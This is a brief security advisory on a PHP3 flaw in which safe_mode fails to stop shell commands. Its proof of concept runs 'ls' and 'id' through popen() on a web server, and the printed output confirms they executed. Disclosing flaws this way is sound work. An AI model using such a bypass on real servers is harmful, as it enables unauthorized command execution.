PHP3 'safe_mode' Failure Vulnerability

As per the message attached in the 'Credit' section.

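<?php
// Run two shell commands through popen() and read back their output.
$fp = popen("ls -l /opt/bin; /usr/bin/id", "r");
echo "$fp<br>\n";
while($line = fgets($fp, 1024)):
    printf("%s<br>\n", $line);
endwhile;
pclose($fp);

// Print the active configuration, including the safe_mode setting.
phpinfo();
?>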

which gave me the following output:

1
total 53
-rwxr-xr-x 1 root root 52292 Jan 3 22:05 ls
uid=30(wwwrun) gid=65534(nogroup) groups=65534(nogroup)

and from the configuration values of phpinfo():

safe_mode 0 1


 

Copyright 2010, SecurityFocus